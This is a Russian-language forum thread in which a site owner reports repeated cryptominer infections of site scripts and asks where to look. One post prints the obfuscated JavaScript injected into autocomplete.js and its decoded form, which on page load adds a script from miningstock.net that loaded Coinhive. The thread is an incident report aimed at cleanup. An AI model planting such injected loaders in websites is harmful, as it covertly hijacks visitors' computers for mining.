[Помощь] СРОЧНО в cpt_maincontent - вставили вирусы - где копать?

RORC

Постоялец
Команда форума
Модератор
Регистрация
14 Июн 2013
Сообщения
380
Реакции
154
А поконкретнее нет расскажете?
12.png

Скрытое содержимое доступно для зарегистрированных пользователей!
 

kam-kamalla

Создатель
Регистрация
14 Июн 2013
Сообщения
24
Реакции
0
тоже нашел у себя майнер, причем за 1 день 3 раза заразу заносили разными путями.

к папке с скриптами (js) был кривой доступ либо через редактор залезли, не знаю, тоже пришлось все пароли менять и проверять скрипты

первый раз - через mloader.js и behavior.js - также как 3 месяца назад

второй раз, буквально через пару часов, снова mloader.js и niftycube.js

тут же грохнул.

под конец закодировали и закинули в autocomplete.js
такой текст

var _0x7824=["\x6F\x6E\x6C\x6F\x61\x64","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x2F\x2F\x6D\x69\x6E\x69\x6E\x67\x73\x74\x6F\x63\x6B\x2E\x6E\x65\x74\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x6A\x73\x2F\x6D\x6C\x6F\x61\x64\x65\x72\x2E\x6A\x73\x3F\x69\x64\x3D\x33\x32\x39\x38\x26\x74\x68\x3D\x35\x30","\x74\x65\x78\x74","\x73\x6F\x72\x74\x74\x61\x62\x6C\x65\x2E\x69\x6E\x69\x74\x28\x29","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];window[_0x7824[0]]= function(){var _0xe5ecx1=document[_0x7824[2]](_0x7824[1]);_0xe5ecx1[_0x7824[3]]= _0x7824[4];_0xe5ecx1[_0x7824[5]]= _0x7824[6];document[_0x7824[9]](_0x7824[8])[0][_0x7824[7]](_0xe5ecx1)}

при переводе Hex Decoder получается

var _0x7824=["onload","script","createElement","src","//miningstock.net/common/js/mloader.js?id=3298&th=50","text","sorttable.init()","appendChild","head","getElementsByTagName"];window[_0x7824[0]]= function(){var _0xe5ecx1=document[_0x7824[2]](_0x7824[1]);_0xe5ecx1[_0x7824[3]]= _0x7824[4];_0xe5ecx1[_0x7824[5]]= _0x7824[6];document[_0x7824[9]](_0x7824[8])[0][_0x7824[7]]


"miningstock.net/common/js/mloader.js?id=3298&th=50", снова грузил coinhive.min.js
 

RORC

Постоялец
Команда форума
Модератор
Регистрация
14 Июн 2013
Сообщения
380
Реакции
154

kam-kamalla

Создатель
Регистрация
14 Июн 2013
Сообщения
24
Реакции
0
посмотрим, все равно узнаем причину и источник рано или поздно. буду внимательно наблюдать
 

RORC

Постоялец
Команда форума
Модератор
Регистрация
14 Июн 2013
Сообщения
380
Реакции
154
все равно узнаем причину и источник рано или поздно
Может пора уже движок сменить? Там где поддерживаю сайты, часть функций переписал, т.к. на старом php сидеть не очень интересно.
 

sealery

Создатель
Регистрация
20 Май 2012
Сообщения
20
Реакции
2
Модули проверяйте, я однажды готовый модуль поставил а он с шеллом оказался.
 
Сверху